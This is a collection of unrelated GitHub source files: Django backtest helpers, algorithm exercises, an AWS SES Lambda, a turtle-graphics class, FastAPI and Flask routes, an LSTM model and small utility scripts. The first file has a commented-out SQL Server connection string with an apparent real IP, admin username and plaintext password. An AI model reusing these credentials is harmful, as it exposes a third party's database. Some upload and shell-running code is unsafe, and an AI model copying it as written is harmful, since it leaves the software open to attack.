+{"seq_id":"26033000944","text":"import csv\nfrom django.db import connection\nimport datetime\nimport pyodbc\nimport random\nimport calculation.Functions_db as func_data\nimport calculation.Calculate as c\nfrom itertools import chain\nimport glob\nimport os\n\n\n#======Database Connections===========================#\n#conn1 = pyodbc.connect('DRIVER={ODBC Driver 11 for SQL Server};SERVER=65.0.33.214;DATABASE=FDS_Datafeeds;UID=sa;PWD=Indxx@1234')\n#cur = conn1.cursor()\n\ndef Load_CSV(file_Name,tax_file_path): \n #final_data = cal.Validate_Read_CSV(file_Name,IDentifier) \n cal = c.Calculation()\n with cal:\n final_data = cal.Load_CSV(file_Name,tax_file_path) \n return final_data\n\ndef Validate_Read_CSV(file_Name, IDentifier, tax_file_path):\n #print('Validate_Read_CSV start') \n #final_data = cal.Validate_Read_CSV(file_Name,IDentifier) \n cal = c.Calculation()\n with cal:\n final_data = cal.Validate_Read_CSV(file_Name,IDentifier,tax_file_path) \n #print('final_data:',final_data) \n return final_data\n \ndef Cal_Index(D_Index,csv_data): \n #files = cal.Cal_Index(D_Index,D_Data,D_ISIN,D_Date,quote_data,last_Period,cur)\n files ={}\n cal = c.Calculation()\n with cal:\n files = cal.Cal_Index(D_Index,csv_data)\n return files\n\n\ndef handle_uploaded_file(file, confirmbox):\n\n if file:\n #print('file is there')\n #print(file)\n random_id = ''.join([str(random.randint(0, 999)).zfill(3) for _ in range(2)])\n file_name = random_id+'-'+file.name\n if confirmbox == '': \n with open('./static/backtest-file/input/'+file_name, 'wb+') as destination:\n for chunk in file.chunks():\n destination.write(chunk)\n print('handle_uploaded_file end')\n return file_name\n\n\n# def save_input_file(input_file,save_data):\n# print('input_file save hare ')\n# file=input_file\n# random_id = ''.join([str(random.randint(0, 999)).zfill(3) for _ in range(2)])\n# save_inputfile = random_id+'-'+file.name\n# print('save_file',save_inputfile)\n# if save_data=='yes':\n# with open('./static/backtest-file/input_file_save/'+save_inputfile, 'wb+') as destination:\n# for chunk in input_file.chunks():\n# destination.write(chunk)\n# return True\ndef save_input_file(input_file):\n print('input_file save hare ')\n file=input_file\n random_id = ''.join([str(random.randint(0, 999)).zfill(3) for _ in range(2)])\n save_inputfile = random_id+'-'+file.name\n input_file_location = './static/backtest-file/rerun_input_files/'+save_inputfile\n\n with open('./static/backtest-file/rerun_input_files/'+save_inputfile, 'wb+') as destination:\n for chunk in input_file.chunks():\n destination.write(chunk)\n file_with_location={'save_inputfile':save_inputfile,'input_file_location':input_file_location}\n return file_with_location\n\ndef remove_percent_symbole(weight):\n weight = list(weight)\n weight = weight[:-1]\n weight = ''.join([str(elem) for elem in weight])\n return weight\n\ndef Rerun_Dbdata(D_Index, start_date, end_date, Period, get_composition):\n D_Data ={}\n D_ISIN ={}\n D_Date ={}\n data = []\n D_RIC_ISIN = {}\n quote_data = {}\n \n st_date = str(Period[\"Last\"])+\"_START\"\n en_date = str(Period[\"Last\"])+\"_END\"\n \n D_Date[st_date] = start_date\n D_Date[en_date] = end_date\n comp_isin =[]\n outer_comp_list =[]\n for data_composition in get_composition:\n comp_data = []\n weights = data_composition.weights\n weights = float(weights)\n comp_data.append(Period[\"Last\"])\n comp_data.append(data_composition.isin)\n comp_data.append(weights)\n comp_data.append(start_date)\n comp_data.append(end_date)\n comp_data.append(data_composition.country)\n comp_data.append(data_composition.ric)\n outer_comp_list.append(comp_data)\n comp_isin.append(data_composition.isin)\n D_RIC_ISIN[data_composition.ric] = data_composition.isin\n quote_data[data_composition.isin] = data_composition.quote_id\n data.append(outer_comp_list)\n D_Data[str(Period[\"Last\"])] = outer_comp_list\n D_ISIN [str(Period[\"Last\"])] = comp_isin\n #save_file = Cal_Index(D_Index, D_Data, D_ISIN, D_Date, D_RIC_ISIN, period)\n #return save_file\n files ={}\n cal = c.Calculation()\n with cal:\n tax_Rate = func_data.Read_Tax('')\n #print(tax_Rate)\n #files = cal.Cal_Index(D_Index,D_Data,D_ISIN,D_Date,quote_data,Period,comp_isin,tax_Rate)\n csv_data={}\n csv_data['D_Data']=D_Data\n csv_data['D_ISIN']=D_ISIN\n csv_data['D_Date']=D_Date\n csv_data['Period']=Period\n csv_data['ISIN_LIST']=comp_isin\n csv_data[\"Tax_Rate\"]=tax_Rate\n csv_data[\"MISSING_RIC_ISIN_LIST\"]=''\n csv_data[\"D_ISIN_RIC\"]=D_RIC_ISIN\n\n print('csv_data:',csv_data)\n files = cal.Cal_Index(D_Index,csv_data)\n\n return files\n\n\ndef Rerun_Dbdata1(D_Index,file_name,end_date):\n taxFileName=''\n csv_data1 = Load_CSV('./static/backtest-file/rerun_input_files/'+str(file_name),taxFileName)\n csv_data=csv_data1\n\n #print('csv_data in Rerun_Dbdata1:',csv_data)\n #print('csv_data[D_Date]',csv_data['D_Date'])\n a=csv_data['D_Date']\n last_peroid = list(csv_data['D_Date'])[-1]\n #dict = {last_peroid:date}\n dict = {last_peroid:end_date}\n #print('...',dict)\n a.update(dict)\n # print('update_dict',a)\n # print(csv_data['D_Date']['2_END'])\n # print('Updated_csv',csv_data)\n\n cal = c.Calculation()\n with cal:\n files = cal.Cal_Index(D_Index,csv_data)\n return files\n\n\n\ndef DateTime(current_time):\n date_time = datetime.datetime.strptime(current_time, \"%m-%d-%Y\")\n cr_date = date_time.strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n return cr_date","repo_name":"rafindx/Backtest","sub_path":"calculation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23565248744","text":"\"\"\" Problem statement:\nhttps://leetcode.com/problems/min-stack/description/\n--------------------------------------------------------------------------------\nDesign a stack that supports push, pop, top, and retrieving the minimum element\nin O(1) time.\n\npush(x) -- Push element x onto stack.\npop() -- Removes the element on top of the stack.\ntop() -- Get the top element.\ngetMin() -- Retrieve the minimum element in the stack.\n--------------------------------------------------------------------------------\nImplementation of min stack in Python is the following.\nImplement a regular stack data structure using array. Then initialize another\narray within that's gonna hold the indices of minimum elements. Treat this array\nas stack. So the index of last minimum element is gonna be the last element in\nthis stack. This way can always keep track of the next minimum element when we\npop the current minimum element from the stack. Details below.\n\"\"\"\n\n\nclass MinStack:\n def __init__(self):\n \"\"\" Array self.elements is gonna hold all the elements of the stack,\n array self.min_index is gonna hold indices of minimum elements.\n \"\"\"\n self.elements = [] # current elements on the stack\n self.min_index = [] # indices of min elements\n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: void\n \"\"\"\n self.elements.append(x)\n if not self.min_index \\\n or self.elements[-1] < self.elements[self.min_index[-1]]:\n self.min_index.append(len(self.elements) - 1)\n\n def pop(self):\n \"\"\"\n :rtype: void\n \"\"\"\n # special case, stack is empty\n if not self.elements:\n return # do nothing\n # to-be-removed element is current min\n if self.min_index[-1] == len(self.elements) - 1:\n self.min_index.pop() # update current min index\n self.elements.pop() # remove element\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if not self.elements: # stack is empty\n return -1\n return self.elements[-1]\n\n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if not self.elements: # stack is empty\n return -1\n return self.elements[self.min_index[-1]] # return element at min index\n\n\nif __name__ == \"__main__\":\n stack = MinStack()\n\n stack.push(1)\n stack.push(2)\n print(f\"last element is {stack.top()}, min element is {stack.getMin()}\")\n stack.push(-2)\n stack.push(3)\n stack.push(4)\n print(f\"last element is {stack.top()}, min element is {stack.getMin()}\")\n stack.pop()\n stack.pop()\n stack.pop()\n print(f\"last element is {stack.top()}, min element is {stack.getMin()}\")\n","repo_name":"vladn90/Algorithms","sub_path":"Stack/min_stack.py","file_name":"min_stack.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43643739550","text":"import boto3\nimport json\nimport os\n\nfrom boto3.dynamodb.types import TypeDeserializer\nfrom botocore.exceptions import ClientError\n\nprint(\"Loading function\")\n\nses = boto3.client(\"ses\")\ntd = TypeDeserializer()\n\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n for record in event[\"Records\"]:\n print(record[\"eventID\"])\n print(record[\"eventName\"])\n print(\"DynamoDB Record: \" + json.dumps(record[\"dynamodb\"], indent=2))\n\n data = record[\"dynamodb\"].get(\"NewImage\")\n d = {}\n for key in data:\n d[key] = td.deserialize(data[key])\n\n print(d)\n\n send_email(d)\n\n print(\"Successfully processed {} records.\".format(len(event[\"Records\"])))\n\n\ndef send_email(data):\n SENDER = os.environ[\"SENDER\"]\n CHARSET = \"UTF-8\"\n SUBJECT = \"Pinehead Records: Order Confirmation\"\n\n BODY_TEXT = (\n \"Pinehead Records: Order Confirmation\\r\\n\"\n f\"Order ID: {data['id']}\"\n f\"Album: {data['album']['title']} ({data['album']['year']})\"\n f\"Format: {data['album']['format']}\"\n f\"Amount: {data['amount']}\"\n )\n\n BODY_HTML = f\"\"\"\n \n \n

Pinehead Records: Order Confirmation

\n
    \n
  • Order ID: {data['id']}
  • \n
  • Album: {data['album']['title']}
  • \n
  • Format: {data['album']['format']}
  • \n
  • Amount: {data['amount']}
  • \n
\n \n \n \"\"\"\n\n try:\n response = ses.send_email(\n Destination={\"ToAddresses\": [data[\"email\"]]},\n Message={\n \"Body\": {\n \"Html\": {\"Charset\": CHARSET, \"Data\": BODY_HTML},\n \"Text\": {\"Charset\": CHARSET, \"Data\": BODY_TEXT},\n },\n \"Subject\": {\"Charset\": CHARSET, \"Data\": SUBJECT},\n },\n Source=SENDER,\n )\n except ClientError as e:\n print(e.response[\"Error\"][\"Message\"])\n else:\n print(\"Email sent! Message ID:\"),\n print(response[\"MessageId\"])\n","repo_name":"linuxacademy/content-dynamodb-deepdive","sub_path":"6.1.2-Triggers/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"54"} +{"seq_id":"26638998698","text":"\nimport math\nfrom renderer_base import RendererBase\n\n\nclass Turtle:\n \"\"\"\n This is a faster turtle implementation than the built in turtle implementation\n \"\"\"\n\n def __init__(self):\n self._x = 0\n self._y = 0\n self._angle = 0\n\n self._min_x = 0\n self._max_x = 0\n self._min_y = 0\n self._max_y = 0\n\n self._lines = []\n self._poly_lines = []\n self._widths = []\n self._colours = []\n self._fill_colours = []\n\n self._width = 1\n self._colour = (0, 0, 0, 255)\n self._fill_colour = (0, 0, 0, 255)\n self._state = False\n self._is_poly = False\n\n def render(self, renderer: RendererBase, auto_scale=True, auto_offset=True, auto_margin=0.1, flush=True):\n \"\"\"\n Renders the line and polygons using the given renderer\n\n :param renderer: The renderer object extending RendererBase, used to render the lines and polygons\n :param auto_scale: If true, automatically scald the turtle's drawing to fit the canvas size\n :param auto_offset: If true, automatically places the turtle's drawing in the center of the canvas\n :param auto_margin: The margin to the edge of the renderer's canvas for auto_scale\n :param flush: If true, the existing line and polygon data will be deleted\n \"\"\"\n\n w = self._max_x - self._min_x\n h = self._max_y - self._min_y\n\n scale = min((renderer.size[0] * (1.0 - auto_margin)) / w, (renderer.size[1] * (1.0 - auto_margin)) / h)\n\n screen_center_x = renderer.size[0] / 2\n screen_center_y = renderer.size[1] / 2\n\n real_center_x = (self._max_x - (w / 2))\n real_center_y = (self._max_y - (h / 2))\n\n if auto_scale:\n renderer.setup_scale(scale)\n real_center_x *= scale\n real_center_y *= scale\n if auto_offset:\n offset_x = screen_center_x - real_center_x\n offset_y = screen_center_y - real_center_y\n renderer.setup_offset(offset_x, offset_y)\n\n renderer.draw_polygons(self._poly_lines, self._fill_colours)\n renderer.draw_lines(self._lines, self._widths, self._colours)\n\n if flush:\n self._lines = []\n self._widths = []\n self._colours = []\n self._poly_lines = []\n self._fill_colours = []\n\n def _draw(self, distance):\n \"\"\"\n Draws a line while moving forward\n\n :param distance: The distance to move forward\n \"\"\"\n\n x0 = self._x\n y0 = self._y\n self._move(distance)\n self._add_line(x0, y0)\n\n def _check_minmax(self):\n \"\"\"\n Checks the minimum and maxiumum x, y coordinates to enable auto_offset and auto_scale later\n \"\"\"\n\n if self._x - self._width * 0.5 < self._min_x:\n self._min_x = self._x - self._width * 0.5\n elif self._x + self._width * 0.5 > self._max_x:\n self._max_x = self._x + self._width * 0.5\n\n if self._y - self._width * 0.5< self._min_y:\n self._min_y = self._y - self._width * 0.5\n elif self._y + self._width * 0.5 > self._max_y:\n self._max_y = self._y + self._width * 0.5\n\n def _add_line(self, x0, y0):\n \"\"\"\n Adds another drawn line\n\n :param x0: The starting x coordinate\n :param y0: The starting y coordinate\n \"\"\"\n\n self._check_minmax()\n self._lines.append((x0, y0, self._x, self._y))\n self._widths.append(int(self._width))\n self._colours.append(self._colour)\n\n def _add_poly(self):\n \"\"\"\n Adds another point to the current polygon\n \"\"\"\n\n if not self._state:\n self._check_minmax()\n\n self._poly_lines[-1].append((self._x, self._y))\n\n def _move(self, distance):\n self._x -= math.cos(self._angle * 0.01745329251) * distance\n self._y -= math.sin(self._angle * 0.01745329251) * distance\n\n def _int4_tuple(self, t, v0, v1, v2, v3):\n return tuple([int(v) for v in t + (v0, v1, v2, v3)[:4-len(t)]])\n\n def forward(self, distance):\n \"\"\"\n Moves the turtle forward\n\n :param distance: The distance to move forward\n \"\"\"\n\n if self._state:\n self._draw(distance)\n else:\n self._move(distance)\n\n if self._is_poly:\n self._add_poly()\n\n def backward(self, distance):\n \"\"\"\n Moves the turtle backward\n\n :param distance: The distance to move backward\n \"\"\"\n\n if self._state or self._is_poly:\n self._draw(- distance)\n else:\n self._move(- distance)\n\n if self._is_poly:\n self._add_poly()\n\n def pendown(self):\n \"\"\"\n Begins the drawing of lines with the turtle's width and colour\n \"\"\"\n\n self._state = True\n\n def penup(self):\n \"\"\"\n Ends the drawing of lines\n \"\"\"\n\n self._state = False\n\n def begin_poly(self):\n \"\"\"\n Begins the drawing of a polygon with the turtle's fillcolour\n \"\"\"\n\n self._is_poly = True\n self._poly_lines.append([])\n self._poly_lines[-1].append((self._x, self._y))\n\n def end_poly(self):\n \"\"\"\n Ends the drawing of the polygon\n \"\"\"\n\n self._is_poly = False\n self._fill_colours.append(self._fill_colour)\n\n def right(self, angle):\n \"\"\"\n Turns the turtle right\n\n :param angle: The angle to turn right\n \"\"\"\n\n self._angle += angle\n\n def left(self, angle):\n \"\"\"\n Turns the turtle left\n\n :param angle: The angle to turn left\n \"\"\"\n\n self._angle -= angle\n\n def get_heading(self):\n \"\"\"\n Returns the heading of the turtle\n\n :return: Float angle of turtle\n \"\"\"\n\n return self._angle\n\n def get_position(self):\n \"\"\"\n Returns the x, y coordinates of the turtle\n\n :return: Tuple XY\n \"\"\"\n\n return self._x, self._y\n\n def set_heading(self, angle):\n \"\"\"\n Directly sets the heading of the turtle\n\n :param angle: The new heading angle\n \"\"\"\n\n self._angle = angle\n\n def pencolour(self, r, g=0, b=0, a=255):\n \"\"\"\n Sets the colour of the line drawn by the turtle\n\n :param r: Either a tuple of RGBA, or the red value\n :param g: The green value\n :param b: The blue value\n :param a: The alpha value\n \"\"\"\n\n if isinstance(r, tuple):\n self._colour = self._int4_tuple(r, 0, g, b, a)\n else:\n self._colour = (r, g, b, a)\n\n def fill(self, r, g=0, b=0, a=255):\n \"\"\"\n Sets the fill colour of the polygon drawn by the turtle\n\n :param r: Either a tuple of RGBA, or the red value\n :param g: The green value\n :param b: The blue value\n :param a: The alpha value\n \"\"\"\n\n if isinstance(r, tuple):\n self._fill_colour = r\n else:\n self._fill_colour = (r, g, b, a)\n\n def set_position(self, pos, y=None):\n \"\"\"\n Directly sets the position of the turtle (with drawing a line if the pen is down)\n\n :param pos: Either a tuple of XY, or the new x value\n :param y: The new y value\n \"\"\"\n\n x0 = self._x\n y0 = self._y\n\n if isinstance(pos, tuple):\n self._x = pos[0]\n self._y = pos[1]\n else:\n self._x = pos\n self._y = y\n\n if self._state:\n self._add_line(x0, y0)\n if self._is_poly:\n self._add_poly()\n\n def goto(self, pos, y=None):\n \"\"\"\n Same as Turtle.set_position\n \"\"\"\n\n self.set_position(pos, y)\n\n def set_x(self, x):\n \"\"\"\n Directly sets the x coordinate of the turtle (with drawing a line if the pen is down)\n\n :param x: The new x coordinate\n \"\"\"\n\n x0 = self._x\n\n self._x = x\n if self._state:\n self._add_line(x0, self._y)\n if self._is_poly:\n self._add_poly()\n\n def set_y(self, y):\n \"\"\"\n Directly sets the y coordinate of the turtle (with drawing a line if the pen is down)\n\n :param y: The new y coordinate\n \"\"\"\n\n y0 = self._y\n\n self._y = y\n if self._state:\n self._add_line(self._x, y0)\n if self._is_poly:\n self._add_poly()\n\n def pensize(self, size):\n \"\"\"\n Sets the pen size (/ width) of the turtle\n\n :param size: The new size\n \"\"\"\n\n self._width = size\n\n def get_size(self):\n \"\"\"\n Returns the size of the turtle's pen\n \"\"\"\n return self._width\n\n def get_colour(self):\n \"\"\"\n Returns the turtle's pen colour\n\n :return: Tuple RGBA\n \"\"\"\n\n return self._colour\n\n def get_fill(self):\n \"\"\"\n Returns the turtle's fill colour for polygons\n\n :return: Tuple RGBA\n \"\"\"\n\n return self._fill_colour\n","repo_name":"Inspiaaa/Faster-Turtle","sub_path":"turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"28425435770","text":"from fastapi import APIRouter, Request, Response, Depends\n\nfrom ....core.config import logger\nfrom ....crud import attachment\n\nrouter = APIRouter()\n\n\nasync def verify_module_access(request: Request, module_name: str):\n logger.debug('Request type: ' + request.method)\n logger.debug('Module: ' + module_name)\n\n\n@router.post('/{module_name}', dependencies=[Depends(verify_module_access)], status_code=201)\nasync def create_attachment(module_name: str, request_data: dict, response: Response):\n result = await attachment.post_attachment_new(module_name, request_data['new_document'])\n\n returnResponse = {}\n if 'type' in result:\n if result['type'] == 'error' or result['type'] == 'exception':\n response.status_code = 400\n\n if result['type'] == 'exception':\n returnResponse['errorType'] = result['errorType']\n returnResponse['errorMessage'] = result['errorMessage']\n\n returnResponse['message'] = result['message']\n return returnResponse\n\n\n@router.delete('/{module_name}/{file_id}', dependencies=[Depends(verify_module_access)], status_code=200)\nasync def delete_attachment(module_name: str, file_id: str, response: Response):\n result = await attachment.delete_attchment_from_api(module_name, file_id)\n\n returnResponse = {}\n if 'type' in result:\n if result['type'] == 'error' or result['type'] == 'exception':\n response.status_code = 400\n\n if result['type'] == 'exception':\n returnResponse['errorType'] = result['errorType']\n returnResponse['errorMessage'] = result['errorMessage']\n\n returnResponse['message'] = result['message']\n return returnResponse\n","repo_name":"sujalkpatel/crm_fastAPI","sub_path":"app/api/api_v1/endpoints/attachment.py","file_name":"attachment.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6509922383","text":"import torch.nn as nn\n\n\nclass CharacterLanguageModel(nn.Module):\n def __init__(\n self,\n no_characters,\n embedding_dim,\n no_layers,\n lstms_hidden,\n lstm_out,\n last_time_step_only=True,\n ):\n super().__init__()\n\n self.embedding = nn.Embedding(no_characters + 1, embedding_dim)\n self._last_only = last_time_step_only\n\n class DropHidden(nn.Module):\n def __init__(self, lstm):\n super().__init__()\n self.lstm = lstm\n\n def forward(self, X):\n X, _ = self.lstm(X)\n return X\n\n sizes = [embedding_dim, *[lstms_hidden] * no_layers, lstm_out]\n self.lstms = nn.Sequential(\n *[\n DropHidden(nn.LSTM(_in, _out, batch_first=True))\n for _in, _out in zip(sizes[:-1], sizes[1:])\n ]\n )\n self.output_layer = nn.Linear(lstm_out, no_characters)\n\n @property\n def number_of_parameters(self):\n return sum(p.numel() for p in self.parameters() if p.requires_grad)\n\n def forward(self, X):\n X = self.embedding(X)\n X = self.lstms(X)\n if self._last_only:\n X = X[:, -1] # taking last time step\n X = self.output_layer(X)\n\n return X\n","repo_name":"arod40/nlp-ass3","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12203479607","text":"\"\"\"\nBaekJoon 27930번 문제\n당신은 운명을 믿나요?\n2023 고려대학교x연세대학교 프로그래밍 경시대회 Open Contest\n\n문제 풀이\n\"\"\"\n\n\nclass AreYouTrustDestiny:\n def __init__(self):\n self._destiny_string_part_list = list(input())\n self._korea_univ = [\"K\", \"O\", \"R\", \"E\", \"A\"]\n self._yonsei_univ = [\"Y\", \"O\", \"N\", \"S\", \"E\", \"I\"]\n self._korea_check_count = 0\n self._yonsei_check_count = 0\n self.DestinyResult()\n\n def _check_destiny(self) -> str:\n for destiny_part in self._destiny_string_part_list:\n if self._yonsei_check_count == 6:\n return \"YONSEI\"\n\n elif self._korea_check_count == 5:\n return \"KOREA\"\n\n self._yonsei_check_count += 1 if destiny_part == self._yonsei_univ[self._yonsei_check_count] else 0\n self._korea_check_count += 1 if destiny_part == self._korea_univ[self._korea_check_count] else 0\n\n def DestinyResult(self):\n destiny_result = self._check_destiny()\n if destiny_result is not None:\n print(destiny_result)\n\n\nif __name__ == '__main__':\n AYTD = AreYouTrustDestiny()\n","repo_name":"ABER1047/BaekJoon-Study","sub_path":"[Source_Code] APSODE/2023_04_03.py","file_name":"2023_04_03.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11912819726","text":"from flask import Blueprint, render_template, url_for, redirect, flash, request, abort\nfrom flask_login import login_required, current_user\nfrom market import db\nfrom market.models import User_post\nfrom Posts.forms import New_article\n\nposts = Blueprint('posts', __name__)\n\n# ROUTE TO CREATE NEW ARTICLE\n@posts.route('/article', methods=['GET', 'POST'])\n@login_required\ndef new_article():\n form = New_article()\n\n if form.validate_on_submit():\n post = User_post(title = form.title.data, content = form.content.data, author = current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post has been created!', 'success')\n return redirect(url_for('main.home'))\n\n return render_template('create-article.html', title = 'New Article', form=form, legend='New Post')\n\n@posts.route('/update/', methods=['GET', 'POST'])\n@login_required\ndef update_article(article_id):\n post = User_post.query.get_or_404(article_id)\n if post.author != current_user:\n abort(403)\n form = New_article()\n # UPDATE THE ARTICLE TITLE AND CONTENT\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n return redirect(url_for('users.view_article', article_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n\n return render_template('update.html', title = 'Update', form=form, legend='Edit Article', post=post)\n\n@posts.route('/delete/', methods=['GET'])\n@login_required\ndef delete_article(article_id):\n post = User_post.query.get_or_404(article_id)\n if post.author != current_user:\n abort(403)\n db.session.delete(post)\n db.session.commit()\n flash('Your post has been deleted!', 'success')\n return redirect(url_for('main.home'))","repo_name":"Adekemi02/NetBlog","sub_path":"Posts/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25664011015","text":"#!/usr/bin/env python\n#\n# Remove files quickly from a directory. You can compress or archive them also instead.\n#\n#\n\nimport os,sys,optparse,time,shutil,gzip\n\ndef mkArchiveDir():\n if not (os.path.exists(archivepath)):\n os.mkdir(archivepath)\n\ndef delete(x):\n os.unlink(x)\n\ndef archive(x):\n mkArchiveDir()\n shutil.move(x, archivepath)\n print(\"a\")\n\ndef compress(x):\n mkArchiveDir()\n in_data = open(x, \"rb\").read()\n out_gz = archivepath + x + \".gz\"\n gzf = gzip.open(out_gz, \"wb\")\n gzf.write(in_data)\n gzf.close()\n delete(x)\n\ndef main():\n parser = optparse.OptionParser('[-] Usage: dircleaner.py '+ '-p -s -a ')\n parser.add_option('-p', dest='path', type='string', help='work path')\n parser.add_option('-s', dest='seconds', type='int', help='number of seconds in the past since now')\n parser.add_option('-a', dest='action', type='string', help='a = archive, ca = compress and archive, d = delete files')\n (options, args) = parser.parse_args()\n\n if (options.path == None) | (options.seconds == None) | (options.action == None):\n sys.exit(parser.usage)\n\n path = options.path\n seconds = options.seconds\n action = options.action\n\n global archivepath\n archivepath = path + \"archive/\"\n\n if (action != \"a\") & (action != \"d\") & (action != \"ca\"):\n sys.exit(\"Valid actions are:\\n\\na = archive, ca = compress and archive, d = delete files\\n\\nInsert coin and try again! \")\n\n now = int(time.time())\n files = os.listdir(path)\n os.chdir(path)\n\n for a in files:\n if os.path.isfile(a):\n stat = os.stat(a)\n ctime = int(stat.st_ctime)\n diff = now - ctime\n if diff > seconds:\n if action == \"a\":\n archive(a)\n elif action ==\"ca\":\n compress(a)\n elif action == \"d\":\n delete(a)\n\n####################################################################\n\nif __name__ == '__main__':\n main()\n","repo_name":"BrunoGallant/dircleaner","sub_path":"dircleaner.py","file_name":"dircleaner.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15789244222","text":"import math\nprint(math.e)\nprint(\"shiyanyou\")\nprint(\"shiyanlou's best\")\nprint('shiyanlou\\'s best')\n\nnumber = int(input(\"Enterr an interger: \"))\nif number <= 100:\n print(\"Your number is smaller than equal to 100\")\nelse:\n print(\"Your number is greater than 100\")\n\namount = float(input(\"Enter amount: \")) # input data\ninrate = float(input(\"Enter Interrest rate: \")) # input inrate\nperiod = int(input(\"Enter period: \")) # input period\nvalue = 0\nyear = 1\nwhile year <= period:\n value = amount + (inrate * amount)\n print(\"Year {} Rs. {:.2f}\".format(year, value))\n amount = value\n year = year + 1\n\nN = 10\nsum = 0\ncount = 0\nprint(\"Please input 10 numbers:\")\nwhile count < N:\n number = float(input())\n sum = sum + number\n count = count + 1\navg = sum / N\nprint(\"N = {}, Sum = {}\".format(N, sum))\nprint(\"Average = {:.2f}\".format(avg))\n\nfahrenheit = 0\nprint(\"Fahrenheit Celsius\")\nwhile fahrenheit <= 250:\n celsius = (fahrenheit - 32) / 1.8\n print(\"{:5d} {:7.2f}\".format(fahrenheit, celsius))\n fahrenheit = fahrenheit + 25\n\ndays = int(input(\"Enter days: \"))\nmonths = days // 30\ndays = days % 30\nprint(\"Months = {} Days = {}\".format(months, days))\ndays = int(input(\"Enter days: \"))\nprint(\"Months = {} Days = {}\".format(*divmod(days, 30)))\n\nN = 100\na = 2\nwhile a < N:\n print(str(a))\n a *= a\n\nsum = 0\nfor i in range(1, 11):\n sum += 1.0 / i;\n print(\"{:2d} {:6.4f}\".format(i, sum))\n\nimport math\ncircle_radius = 2\ncircle_square = circle_radius * circle_radius * math.pi\nprint(\"{:.10f}\".format(circle_square))\n\n","repo_name":"liljungege/PY_2018","sub_path":"PY_2018.08.04/PY_2018.08.04/PY_2018.08.04.py","file_name":"PY_2018.08.04.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34860776635","text":"#Simplify the number!\n#https://www.codewars.com/kata/5800b6568f7ddad2c10000ae\n\ndef simplify(number):\n ans = []\n if number == 0:\n return ''\n\n num_as_str = str(number)\n num_length = len(num_as_str)\n for i in range(0, num_length):\n if int(num_as_str[i])>0:\n tens = 10**(num_length-i-1)\n if tens>1:\n ans.append(str(num_as_str[i]) + '*' + str(tens))\n else:\n ans.append(str(num_as_str[i]))\n\n return \"+\".join(ans)\n","repo_name":"WinrichSy/Codewars_Solutions","sub_path":"Python/6kyu/SimplifyTheNumber.py","file_name":"SimplifyTheNumber.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72471735841","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport subprocess\nimport sys\n\n# input\nparser = argparse.ArgumentParser()\nparser.add_argument('-in', dest=\"COMMANDS_FILE\", default=\"commands.txt\", help=\"Input text file where each line is a command\")\nparser.add_argument('-exclude', dest=\"IGNORE_LINES_STARTING_WITH\", default=\"#,//\", help=\"Ignore lines starting with this comma-separated list of characters\")\nparser.add_argument('-probe', dest=\"PROBE\", action=\"store_true\", help=\"Just print commands?\")\na = parser.parse_args()\n\nlines = []\nwith open(a.COMMANDS_FILE, 'r', encoding=\"utf8\") as f:\n lines = [line.strip() for line in f]\n lines = [line for line in lines if len(line) > 0]\n if len(a.IGNORE_LINES_STARTING_WITH) > 0:\n for string in a.IGNORE_LINES_STARTING_WITH.split(\",\"):\n lines = [line for line in lines if not line.startswith(string.strip())]\n\nfor command in lines:\n print('-------------------------------')\n print(command)\n if a.PROBE:\n continue\n finished = subprocess.check_call(command, shell=True)\n","repo_name":"beefoo/media-tools","sub_path":"run_commands.py","file_name":"run_commands.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"23885151554","text":"import pandas as pd\nimport os\nimport datetime\nfrom random import randrange\nfrom spade.message import Message\nimport math\nimport json\nfrom random import random\nimport numpy as np\nimport statistics as stats\nfrom datetime import timedelta,date\nimport subprocess\nimport time\n\n\ndef agents_data():\n agents_data_df = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n return agents_data_df\n\ndef auction_blank_df():\n \"\"\"Returns df column structure with all necessary information to evaluate auction performance\"\"\"\n df = pd.DataFrame([], columns=['agent_type', 'active_coils', 'auction_coils', 'fab_start', 'coil_ratings',\n 'pre_auction_duration', 'auction_duration'])\n\n '''df = pd.DataFrame([], columns=['id', 'agent_type', 'location_1', 'location_2', 'location',\n 